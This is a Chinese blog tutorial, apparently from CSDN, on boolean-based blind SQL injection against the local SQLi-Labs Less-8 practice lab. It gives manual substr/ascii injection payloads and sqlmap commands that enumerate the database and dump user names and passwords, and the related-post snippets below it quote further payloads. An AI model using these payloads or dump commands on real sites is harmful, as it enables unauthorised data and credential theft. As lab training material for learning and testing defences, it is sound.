09、注入篇--盲注【布尔盲注】

最新推荐文章于 2024-07-17 12:32:24 发布
最新推荐文章于 2024-07-17 12:32:24 发布
阅读量731 收藏 1
点赞数 1
分类专栏: WEB安全 文章标签: 盲注 时间盲注 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/115441986
版权

利用场景

  • 在有些情况下,后台使用了错误信息屏蔽方法(比如@),屏蔽了报错,
  • 无法在根据报错信息来进行注入的判断,该情况称为"盲注"

表现形式

  • based boolean (布尔盲注)
  • based time(时间盲注)

布尔盲注

  • 传入“”错误“”参数和“正确”参数,观察页面是否发生了变化

所用函数

  • length() 获取字符串的长度

  • substr() 截取字符串

    语法:substr(string,num start,num length)

    string 字符串;start 起始位置(从1开始);截取长度

  • ascii() 把字符转换为ascii码值

靶场

1、进入靶场,只显示了you are in…
在这里插入图片描述
.2、将1改为0,观察页面是否发生了变化
you are in… 这三个单词不见了
页面发生变化
在这里插入图片描述

3、貌似是布尔盲注,通过探测得知为字符型布尔盲注
在这里插入图片描述
在这里插入图片描述

4、使用substr() 探测数据库版本号
本地操作:
在这里插入图片描述

靶场:

http://127.0.0.1/sqli/Less-8/?id=1' and substr(version(),1,1)  = 5-- q

在这里插入图片描述
在这里插入图片描述
5、版本号5.0以上,使用length() 探测数据库名的长度

在这里插入图片描述
在这里插入图片描述
6、得知数据库名长度为8,可进行猜单词,会不会是security,8个字母
使用 substr()、ascii()验证猜想
在这里插入图片描述
得知s字母的在ASCII码表中的数字是115
故可以构造poc

 ascii(substr(database(),0,1))=115

在这里插入图片描述

在这里插入图片描述
可以验证当前数据库名的第一个单词是s,猜想正确

验证第二个
在这里插入图片描述
在这里插入图片描述
第二个单词为e,猜想正确
接下来进行一一猜解
7、知道了数据库名后,又知道版本号为5.0以上版本,故可利用information_schema数据库进行爆出相关数据
利用方法与上一步同理
8、由于一个单词一个单词猜解,过于费时费力,所以可以使用自动化工具SQLMap

SQLMap跑布尔盲注

基本操作

 可以使用 --technique 指定SQLMap探测技术
支持的探测方式有:
 - B: 基于Boolean的盲注(Boolean based blind) 
 - Q: 内联查询(inlin queries) 
 - T:基于时间的盲注(time based blind) 
 - U: 联合查询(union query based) 
 - E: 错误(errorbased)

1、由于已经知道存在 布尔盲注

python sqlmap.py -u "http://127.0.0.1/sqli/Less-8/?id=1" --technique B --current-db

得出当前数据库名security
在这里插入图片描述

2、跑security数据库下的表面

python sqlmap.py -u "http://127.0.0.1/sqli/Less-8/?id=1" --technique B -D security 
--tables

在这里插入图片描述

3、跑出 users表下的字段名

python sqlmap.py -u "http://127.0.0.1/sqli/Less-8/?id=1" --technique B -D security -T users --columns

在这里插入图片描述

4、跑出id、username、password的数据

python sqlmap.py -u "http://127.0.0.1/sqli/Less-8/?id=1" --technique B -D security -T users 
-C id,username,password --dump

在这里插入图片描述

小白学安全
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2377
文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 4447
SQL注入 - 布尔盲注及延时注入
SQL注入-基于布尔盲注
xdjxi的博客
02-18 635
实验目的 了解布尔盲注技术的运用场景及条件,熟悉length()、substr()、ascii()等函数的用法,掌握基于布尔盲注基本流程。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-8为入口,利用基于布尔盲注方式获取SQLi-Labs网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-8。访问的URL为: http://[靶机IP]/s
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
SQL盲注注入——布尔
weixin_40709439的博客
08-03 4万+
盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间盲注和报错的盲注。本次主要讲解的是基于布尔盲注。 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语...
布尔盲注
weixin_43271438的博客
10-03 4027
布尔盲注一般是在网页没有报错,回显的时候使用。只能对url输入的判断一个对错,一般一次只能判断一个英文字符 基于布尔盲注Boolean-based blind SQL injection),即可以根据返回页面判断条件真假的注入。比如对参数加一个’ and ‘1’=‘1和’ and ‘1’='2,如果第一个能查询出来,第二个不行,则说明可以注入,后面可以根据字段and exist(…)不断猜测...
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入布尔盲注
mooyuan的博客
11-26 2663
iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔注入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
不再显示错误的盲注布尔盲注时间盲注
qq_44111753的博客
11-25 225
Blind SQL (盲注) : 是注入攻击的其中一种, 向数据库发送 true 或 false 这样的问题, 并根据应用程序返回的信息判断结果. 这种攻击的出现是因为应用程序配置为只显示常规错误, 但并没有解决SQL 注入存在的代码问题. 1、发现盲注 正常输入和错误输入的结果是不一样的,但不会显示报错 2、基于时间盲注 id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),0) --+ if(expr1,expr2,expr3)若表.
10、注入--盲注时间盲注、延时注入
WX公众号-小白学安全
04-05 1627
文章目录原理利用防范靶场 原理 利用 防范 靶场
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
[zkaq靶场]SQL注入--布尔盲注
wwxxee
05-08 194
布尔盲注 常用函数 length() 返回字符串长度 substring() substr() mid() 截取字符串: 参数1:字符串 参数2:起始位置,索引从1开始 参数3:截取长度 concat() 不带分隔符链接字符串 concat_ws() 带分隔符链接字符串: concat_ws(’-’,‘a’,‘b’,‘c’) group_concat() 链接一组查询结果字符串 ord() ascii() 返回字符串的ASCII值 left() 从左边开始截取字符串: 参数1:字符串 参数2:截取的长度 l
SQL注入--报错和盲注
qq_57307348的博客
02-10 1917
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔盲注 基于时间盲注sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
sql注入与sqlmap工具使用
Q1n6
10-28 6284
SQL的注入类型: Boolean-based blind SQL injection(布尔注入)Error-based SQL injection(报错型注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-based blind SQL injection(基于时间延迟注入
SQL注入漏洞(union + 盲注
m0_61506558的博客
09-16 1677
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库有 MySQL,Oracle, PostgreSQL,SQL Server等。
SQL注入漏洞详解
无言道的博客
03-13 1万+
文章目录SQL注入漏洞原理SQL注入内容注入条件判断注入SQL注释符与注入流程 SQL注入漏洞原理 漏洞原理   web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。 检测方法   可以利用sqlmap进行SQL注入的检查或利用,也可以使用其他SQL注入工具。也可以手工测,利用单引号、and 1=1以及字符型
SQL注入漏洞扫描---sqlmap
嘿嘿嘿
05-03 2900
数据库--数据表---字段---字段内容一站式识别
5-10sqli盲注原理及基于boolean盲注的案例演示
山兔的博客
05-20 599
Sql-Inject漏洞-盲注  什么是盲注以及常见的盲注类型  基于boolean(true or false)的盲注测试  基于time的盲注测试 什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错,或者标准输出,输出到了前面,也就是说,并不会向我们之前的测试案例一样,sql注入的语法报错,给输出到了前端。 同时,当我们构造payload输进去的时候,它也并不会把多余的内容,在页面上进行显示,此时无法在根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注” 根据表现形
sqlmap参数详解,功能使用,联合,盲注,报错各种使用
qq_47289634的博客
02-23 2302
使用 Sqlmap 对一个注入点进行测试时,可以使用 -v x 参数指定回显信息的复杂度,x范围为[0~6],共有 7 个等级,默认为 1。–technique 参数用来设置具体SQL注入技术。
sql injection 类型总结
qq_24196029的博客
08-16 1417
前言(废话):本人觉得网上对于SQL类型的分析其实有点混乱(特别是中文网站,误导人),后来我发现其实大家都是根据sqlmap上给出的类型来划分的( --technique=BEUSTQ (Boolean, Error, Union, Stacked, Time, Query Inline) 从实际的理解上来说,这样划分是难以理解的,sqlmap的BEUSTQ是它的注入方式,和类型其实没有什么
burpsuite sql注入漏洞测试(布尔盲注)
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值